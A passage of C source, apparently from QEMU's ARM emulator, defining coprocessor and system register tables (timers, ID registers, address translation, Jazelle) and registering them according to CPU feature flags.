1, .opc1 = 3, .crn = 7, .crm = 3, .opc2 = 7, .type = ARM_CP_NOP, .access = PL0_W, .accessfn = access_predinv }, /* * Note the AArch32 opcodes have a different OPC1. 
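 * The AArch64 CFP_RCTX/DVP_RCTX/CPP_RCTX entries above use opc1 = 3;
 * the AArch32 CFPRCTX/DVPRCTX/CPPRCTX entries below use opc1 = 0 with
 * the same crn = 7, crm = 3 and opc2 = 4/5/7 encodings.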
*/ { .name = "CFPRCTX", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 7, .crm = 3, .opc2 = 4, .type = ARM_CP_NOP, .access = PL0_W, .accessfn = access_predinv }, { .name = "DVPRCTX", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 7, .crm = 3, .opc2 = 5, .type = ARM_CP_NOP, .access = PL0_W, .accessfn = access_predinv }, { .name = "CPPRCTX", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 7, .crm = 3, .opc2 = 7, .type = ARM_CP_NOP, .access = PL0_W, .accessfn = access_predinv }, REGINFO_SENTINEL }; static uint64_t ccsidr2_read(CPUARMState *env, const ARMCPRegInfo *ri) { /* Read the high 32 bits of the current CCSIDR */ return extract64(ccsidr_read(env, ri), 32, 32); } static const ARMCPRegInfo ccsidr2_reginfo[] = { { .name = "CCSIDR2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 1, .crn = 0, .crm = 0, .opc2 = 2, .access = PL1_R, .accessfn = access_aa64_tid2, .readfn = ccsidr2_read, .type = ARM_CP_NO_RAW }, REGINFO_SENTINEL }; static CPAccessResult access_aa64_tid3(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if ((arm_current_el(env) < 2) && (arm_hcr_el2_eff(env) & HCR_TID3)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } static CPAccessResult access_aa32_tid3(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_feature(env, ARM_FEATURE_V8)) { return access_aa64_tid3(env, ri, isread); } return CP_ACCESS_OK; } static CPAccessResult access_jazelle(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1 && (arm_hcr_el2_eff(env) & HCR_TID0)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } static const ARMCPRegInfo jazelle_regs[] = { { .name = "JIDR", .cp = 14, .crn = 0, .crm = 0, .opc1 = 7, .opc2 = 0, .access = PL1_R, .accessfn = access_jazelle, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "JOSCR", .cp = 14, .crn = 1, .crm = 0, .opc1 = 7, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "JMCR", .cp = 14, .crn = 2, .crm = 0, .opc1 = 7, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; static const ARMCPRegInfo vhe_reginfo[] = { { .name = "CONTEXTIDR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 13, .crm = 0, .opc2 = 1, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.contextidr_el[2]) }, { .name = "TTBR1_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 0, .opc2 = 1, .access = PL2_RW, .writefn = vmsa_tcr_ttbr_el2_write, .fieldoffset = offsetof(CPUARMState, cp15.ttbr1_el[2]) }, { .name = "CNTHV_CVAL_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 3, .opc2 = 2, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_HYPVIRT].cval), .type = ARM_CP_IO, .access = PL2_RW, .writefn = gt_hv_cval_write, .raw_writefn = raw_write }, { .name = "CNTHV_TVAL_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 3, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL2_RW, .resetfn = gt_hv_timer_reset, .readfn = gt_hv_tval_read, .writefn = gt_hv_tval_write }, { .name = "CNTHV_CTL_EL2", .state = ARM_CP_STATE_BOTH, .type = ARM_CP_IO, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 3, .opc2 = 1, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_HYPVIRT].ctl), .writefn = gt_hv_ctl_write, .raw_writefn = raw_write }, { .name = "CNTP_CTL_EL02", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 5, .crn = 14, .crm = 2, .opc2 = 1, .type = ARM_CP_IO | ARM_CP_ALIAS, .access = PL2_RW, .accessfn = e2h_access, .fieldoffset = 
offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].ctl), .writefn = gt_phys_ctl_write, .raw_writefn = raw_write }, { .name = "CNTV_CTL_EL02", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 5, .crn = 14, .crm = 3, .opc2 = 1, .type = ARM_CP_IO | ARM_CP_ALIAS, .access = PL2_RW, .accessfn = e2h_access, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].ctl), .writefn = gt_virt_ctl_write, .raw_writefn = raw_write }, { .name = "CNTP_TVAL_EL02", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 5, .crn = 14, .crm = 2, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO | ARM_CP_ALIAS, .access = PL2_RW, .accessfn = e2h_access, .readfn = gt_phys_tval_read, .writefn = gt_phys_tval_write }, { .name = "CNTV_TVAL_EL02", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 5, .crn = 14, .crm = 3, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO | ARM_CP_ALIAS, .access = PL2_RW, .accessfn = e2h_access, .readfn = gt_virt_tval_read, .writefn = gt_virt_tval_write }, { .name = "CNTP_CVAL_EL02", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 5, .crn = 14, .crm = 2, .opc2 = 2, .type = ARM_CP_IO | ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].cval), .access = PL2_RW, .accessfn = e2h_access, .writefn = gt_phys_cval_write, .raw_writefn = raw_write }, { .name = "CNTV_CVAL_EL02", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 5, .crn = 14, .crm = 3, .opc2 = 2, .type = ARM_CP_IO | ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].cval), .access = PL2_RW, .accessfn = e2h_access, .writefn = gt_virt_cval_write, .raw_writefn = raw_write }, REGINFO_SENTINEL }; static const ARMCPRegInfo ats1e1_reginfo[] = { { .name = "AT_S1E1R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 9, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S1E1W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 9, .opc2 = 1, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, REGINFO_SENTINEL }; static const ARMCPRegInfo ats1cp_reginfo[] = { { .name = "ATS1CPRP", .cp = 15, .opc1 = 0, .crn = 7, .crm = 9, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write }, { .name = "ATS1CPWP", .cp = 15, .opc1 = 0, .crn = 7, .crm = 9, .opc2 = 1, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write }, REGINFO_SENTINEL }; /* * ACTLR2 and HACTLR2 map to ACTLR_EL1[63:32] and * ACTLR_EL2[63:32]. They exist only if the ID_MMFR4.AC2 field * is non-zero, which is never for ARMv7, optionally in ARMv8 * and mandatorily for ARMv8.2 and up. * ACTLR2 is banked for S and NS if EL3 is AArch32. Since QEMU's * implementation is RAZ/WI we can ignore this detail, as we * do for ACTLR. 
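 * Both registers are therefore modelled below as ARM_CP_CONST with a
 * zero resetvalue: reads return 0 and, as CONST registers carry no
 * backing storage, writes are simply discarded, which is the intended
 * RAZ/WI behaviour.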
*/ static const ARMCPRegInfo actlr2_hactlr2_reginfo[] = { { .name = "ACTLR2", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 1, .crm = 0, .opc2 = 3, .access = PL1_RW, .accessfn = access_tacr, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HACTLR2", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 1, .crm = 0, .opc2 = 3, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; void register_cp_regs_for_features(ARMCPU *cpu) { /* Register all the coprocessor registers based on feature bits */ CPUARMState *env = &cpu->env; if (arm_feature(env, ARM_FEATURE_M)) { /* M profile has no coprocessor registers */ return; } define_arm_cp_regs(cpu, cp_reginfo); if (!arm_feature(env, ARM_FEATURE_V8)) { /* Must go early as it is full of wildcards that may be * overridden by later definitions. */ define_arm_cp_regs(cpu, not_v8_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_V6)) { /* The ID registers all have impdef reset values */ ARMCPRegInfo v6_idregs[] = { { .name = "ID_PFR0", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 0, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->id_pfr0 }, /* ID_PFR1 is not a plain ARM_CP_CONST because we don't know * the value of the GIC field until after we define these regs. */ { .name = "ID_PFR1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 1, .access = PL1_R, .type = ARM_CP_NO_RAW, .accessfn = access_aa32_tid3, .readfn = id_pfr1_read, .writefn = arm_cp_write_ignore }, { .name = "ID_DFR0", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_dfr0 }, { .name = "ID_AFR0", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 3, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->id_afr0 }, { .name = "ID_MMFR0", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_mmfr0 }, { .name = "ID_MMFR1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 5, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_mmfr1 }, { .name = "ID_MMFR2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_mmfr2 }, { .name = "ID_MMFR3", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_mmfr3 }, { .name = "ID_ISAR0", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 0, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar0 }, { .name = "ID_ISAR1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar1 }, { .name = "ID_ISAR2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar2 }, { .name = "ID_ISAR3", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 3, .access = PL1_R, .type = 
ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar3 }, { .name = "ID_ISAR4", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar4 }, { .name = "ID_ISAR5", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 5, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar5 }, { .name = "ID_MMFR4", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_mmfr4 }, { .name = "ID_ISAR6", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa32_tid3, .resetvalue = cpu->isar.id_isar6 }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, v6_idregs); define_arm_cp_regs(cpu, v6_cp_reginfo); } else { define_arm_cp_regs(cpu, not_v6_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_V6K)) { define_arm_cp_regs(cpu, v6k_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_V7MP) && !arm_feature(env, ARM_FEATURE_PMSA)) { define_arm_cp_regs(cpu, v7mp_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_V7VE)) { define_arm_cp_regs(cpu, pmovsset_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_V7)) { ARMCPRegInfo clidr = { .name = "CLIDR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 0, .crm = 0, .opc1 = 1, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid2, .resetvalue = cpu->clidr }; define_one_arm_cp_reg(cpu, &clidr); define_arm_cp_regs(cpu, v7_cp_reginfo); define_debug_regs(cpu); define_pmu_regs(cpu); } else { define_arm_cp_regs(cpu, not_v7_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_V8)) { /* AArch64 ID registers, which all have impdef reset values. * Note that within the ID register ranges the unused slots * must all RAZ, not UNDEF; future architecture versions may * define new registers here. */ ARMCPRegInfo v8_idregs[] = { /* * ID_AA64PFR0_EL1 is not a plain ARM_CP_CONST in system * emulation because we don't know the right value for the * GIC field until after we define these regs. */ { .name = "ID_AA64PFR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 0, .access = PL1_R, .type = ARM_CP_NO_RAW, .accessfn = access_aa64_tid3, .readfn = id_aa64pfr0_read, .writefn = arm_cp_write_ignore }, { .name = "ID_AA64PFR1_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64pfr1}, { .name = "ID_AA64PFR2_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64PFR3_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 3, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ZFR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, /* At present, only SVEver == 0 is defined anyway. 
*/ .resetvalue = 0 }, { .name = "ID_AA64PFR5_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 5, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64PFR6_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64PFR7_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 4, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64DFR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 0, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64dfr0 }, { .name = "ID_AA64DFR1_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64dfr1 }, { .name = "ID_AA64DFR2_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64DFR3_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 3, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64AFR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->id_aa64afr0 }, { .name = "ID_AA64AFR1_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 5, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->id_aa64afr1 }, { .name = "ID_AA64AFR2_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64AFR3_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 5, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ISAR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 0, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64isar0 }, { .name = "ID_AA64ISAR1_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64isar1 }, { .name = "ID_AA64ISAR2_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ISAR3_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 3, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ISAR4_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ISAR5_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 5, .access = PL1_R, .type = 
ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ISAR6_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64ISAR7_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 6, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64MMFR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 0, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64mmfr0 }, { .name = "ID_AA64MMFR1_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64mmfr1 }, { .name = "ID_AA64MMFR2_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.id_aa64mmfr2 }, { .name = "ID_AA64MMFR3_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 3, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64MMFR4_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64MMFR5_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 5, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64MMFR6_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "ID_AA64MMFR7_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "MVFR0_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 0, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.mvfr0 }, { .name = "MVFR1_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 1, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.mvfr1 }, { .name = "MVFR2_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 2, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = cpu->isar.mvfr2 }, { .name = "MVFR3_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 3, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "MVFR4_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "MVFR5_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 5, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "MVFR6_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST, 
.accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "MVFR7_EL1_RESERVED", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 3, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid3, .resetvalue = 0 }, { .name = "PMCEID0", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 9, .crm = 12, .opc2 = 6, .access = PL0_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = extract64(cpu->pmceid0, 0, 32) }, { .name = "PMCEID0_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 6, .access = PL0_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = cpu->pmceid0 }, { .name = "PMCEID1", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 9, .crm = 12, .opc2 = 7, .access = PL0_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = extract64(cpu->pmceid1, 0, 32) }, { .name = "PMCEID1_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 7, .access = PL0_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = cpu->pmceid1 }, REGINFO_SENTINEL }; /* RVBAR_EL1 is only implemented if EL1 is the highest EL */ if (!arm_feature(env, ARM_FEATURE_EL3) && !arm_feature(env, ARM_FEATURE_EL2)) { ARMCPRegInfo rvbar = { .name = "RVBAR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 12, .crm = 0, .opc2 = 1, .type = ARM_CP_CONST, .access = PL1_R, .resetvalue = cpu->rvbar }; define_one_arm_cp_reg(cpu, &rvbar); } define_arm_cp_regs(cpu, v8_idregs); define_arm_cp_regs(cpu, v8_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_EL2)) { uint64_t vmpidr_def = mpidr_read_val(env); ARMCPRegInfo vpidr_regs[] = { { .name = "VPIDR", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 0, .crm = 0, .opc2 = 0, .access = PL2_RW, .accessfn = access_el3_aa32ns, .resetvalue = cpu->midr, .type = ARM_CP_ALIAS, .fieldoffset = offsetoflow32(CPUARMState, cp15.vpidr_el2) }, { .name = "VPIDR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 0, .crm = 0, .opc2 = 0, .access = PL2_RW, .resetvalue = cpu->midr, .fieldoffset = offsetof(CPUARMState, cp15.vpidr_el2) }, { .name = "VMPIDR", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 0, .crm = 0, .opc2 = 5, .access = PL2_RW, .accessfn = access_el3_aa32ns, .resetvalue = vmpidr_def, .type = ARM_CP_ALIAS, .fieldoffset = offsetoflow32(CPUARMState, cp15.vmpidr_el2) }, { .name = "VMPIDR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 0, .crm = 0, .opc2 = 5, .access = PL2_RW, .resetvalue = vmpidr_def, .fieldoffset = offsetof(CPUARMState, cp15.vmpidr_el2) }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, vpidr_regs); define_arm_cp_regs(cpu, el2_cp_reginfo); if (arm_feature(env, ARM_FEATURE_V8)) { define_arm_cp_regs(cpu, el2_v8_cp_reginfo); } /* RVBAR_EL2 is only implemented if EL2 is the highest EL */ if (!arm_feature(env, 